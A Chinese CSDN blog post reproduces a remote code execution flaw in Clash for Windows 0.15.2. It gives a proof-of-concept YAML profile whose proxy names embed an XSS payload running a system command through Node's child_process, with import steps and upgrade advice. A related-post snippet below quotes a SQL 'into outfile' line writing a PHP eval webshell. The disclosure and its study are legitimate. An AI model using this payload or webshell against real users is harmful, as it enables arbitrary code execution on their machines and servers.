C**sh Rce漏洞复现

已于 2022-11-11 17:14:59 修改
阅读量3.1k 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: 安全 web安全 java
于 2022-02-26 10:54:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WEARE001/article/details/123146639
版权

前言

本文内容仅为技术科普,请勿用于非法用途!
仅展示漏洞,不存在翻墙

一、clash存在漏洞版本

目前发现的漏洞版本是0.15.2。

二、POC利用

新建yaml文件如下:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true


proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

三、复现教程

1.打开clash,进入Profiles,点击import导入刚刚新建的poc.yaml文件。
在这里插入图片描述

2.点击切换到导入的yaml文件上。
在这里插入图片描述

3.切换节点时会弹出计算器,说明远程代码执行成功了
在这里插入图片描述

四、修复建议

升级版本!!!

更多安全分享,请关注【安全info】微信公众号!

流浪法师12
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
yaml配置文件的使用
qq_24276415的博客
03-07 3213
yaml和json一样是一种数据呈现格式 对用户极为友好 跨语言,支持所有编程语言,如python、java、php、js等等 跨平台,如windows、linux、Mac 格式简单,比json更加简洁 应用极为广泛 1.读写文件 import yaml def readYaml(path): with open(path,'r',encoding='utf-8') as r: config = yaml.full_lo
S2-RCE漏洞复现之S2-008、S2-009、S2-012
不想当脚本小子的脚本小子
02-07 238
S2-008 RCE: http://note.youdao.com/noteshare?id=34c9b26ad2b1aa68ea2d90c470494f5c&sub=787243D32DCE4BA8B18C4E4F726D5CAC S2-009 RCE: http://note.youdao.com/noteshare?id=80738a6edbac5ce7d91ea12bd71ea01c&sub=00E06768A8984D3FB63FFA8879767429 S2-012 R
Stack Clash 漏洞正粉碎 Linux 防御危及 root 权限
chengli1824的博客
07-03 114
原文链接 据安全厂商 Qualys 研究人员最新发现,Linux、BSD、Solaris 和其它开源系统都易受一个本地权限升级漏洞 “Stack Clash” 的影响,攻击者可以利用其粉碎linux防御,获取 root 权限执行代码。 Qualys 公司指出,该...
linux下clash启动出现“server error: listen tcp 127.0.0.1:7890: bind: address already in use”的解决方法
qq_45772881的博客
05-09 1万+
解决clash在Ubuntu系统下出现端口冲突的情况
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 8108
这周来学习下命令执行漏洞;命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时...
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
clash将“全局”设置设为DIRECT和选择某个节点什么区别
pan_1214_的博客
08-21 1万+
"全局" 设置为 "DIRECT": 当你将 "全局" 设置为 "DIRECT" 时,所有的网络流量都会直接发送到互联网上,绕过代理服务器。这意味着你的网络访问不会经过代理节点,所有的数据流量将按照普通的方式进行传输。 这种设置适用于你希望完全绕过代理的情况,通常用于访问一些无需代理的网站或服务,比如本地网站或局域网内的资源。(不需要任何流量通过代理服务器,确保速度和稳定性) "全局"选择某个节点: 选择某个特定的节点意味着你的网络流量会通过该节点进行传输。这个节点可能位于不同的地理位置,可能具有不同
Subscription-service:订阅服务
04-06
Web开发人员测试 欢迎来到您的订阅网页! 在此目录中,您将找到能够运行订阅服务所需的文件。 安装 复制此目录中的所有文件。 打开数据库托管并导入文件database_set_up.sql ,其中包含2个表,这些表具有预填充的示例数据。 然后找到class文件夹并打开database.php文件。 在第3行中,将X替换为数据库凭据。 private $host = "X", $username = "X", $password = "X", $database = "X"; 用法 将文件移到主目录。 在浏览器中打开您的项目。 对于本地服务器,通常为http://localhost/ 要访问URL末尾的管理面板,请输入/admin.php 贡献 如果发现错误,请与我联系。
执行pod repo update 更新慢的解决方案
linmi2006的专栏
07-05 631
上面的命令是给git设置全局代理,但是我们并不希望国内git库也走代理,而是只需要github上的代码库走代理,命令如下。可以使用代理,让终端命令走代理请求,我使用ClashX代理,默认代理端口为 7890,Clashx→配置→打开本地配置文件,找到 config.yaml 文件打开。其实真正慢的原因并不在pod命令,而是在于github上的代码库访问速度慢。配置好代理之后去终端输入git配置命令,命令如下。如果要移除上面设置的git代理,使用如下命令。1. 打开Clashx本地配置文件。
猫头虎解析:如何巧妙避免GET请求中的“EOF“错误?
最新发布
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
09-08 2399
首先,我们要知道"EOF"是"End of File"的缩写,意味着在尝试从连接中读取数据时,连接意外地关闭了。那么,这是由什么原因导致的呢?遇到问题不可怕,关键是要知道如何解决。希望通过这篇文章,大家对GET请求中的"EOF"错误有了更深入的了解,也学会了如何避免它。记住,猫头虎永远在这里,为你答疑解惑!🐯。
getchar()与EOF
thinkingzh的专栏
11-26 183
大师级经典的著作,要字斟句酌的去读,去理解。以前在看K&R的The C Programming Language(SecondEdition)第1.5节的字符输入/输出,被getchar()和EOF所迷惑了。可能主要还是由于没有搞清楚getchar()的工作原理和EOF的用法。因此,感觉很有必要总结一下,不然,很多琐碎的知识点长时间过后就会淡忘的,只有写下来才是最好的方法。其实,getchar()
clash 全部time out解决方法
热门推荐
qq_35576225的博客
06-01 4万+
1.手动设置的DNS出现了问题,改成自动的DNS后,恢复正常。 2.安装双系统后,双系统时间不同步,同步两个系统的时候后恢复正常。
SpringCloudGateway上传文件EOF错误
a151605的博客
08-13 6053
基础环境描述 所有的请求统一发送至 网关(SpringCloudGateway) 由网关处理完数据后通过nacos分发到子服务 问题描述 普通的接口请求没有什么大毛病,但是上传大文件时候,上传服务会报EOF错误(如下图) 上传服务的错误: 网关的报错: 问题分析 原因1: 大家都知道springcloud的gateway并不是使用mvc那套servlet处理的,而是使用webflux处理请求, webflux属于响应式, 请求分发完成后就会等待callback回调, 自己分析可能.
Stack Clash:Linux安全杀手
linuxprobe2017的博客
06-28 807
Linux, OpenBSD, NetBSD, FreeBSD和Solaris系统被爆存在非常严重的内存冲突漏洞,允许攻击者获取root权限并全权控制受感染的系统。这个问题最早由安全供应商Qualys发现,并根据该漏洞需要和其他的内存区的堆栈进行“碰撞冲突”特性,将其命名为“Stack Clash”(堆栈冲突)。
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行)漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意,如果使用PHP7,在调用有参函数但没有传入参数的情况下会报错,因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.csdn.net/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞】ThinkPHP 3.2.3 漏洞复现](https://blog.csdn.net/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值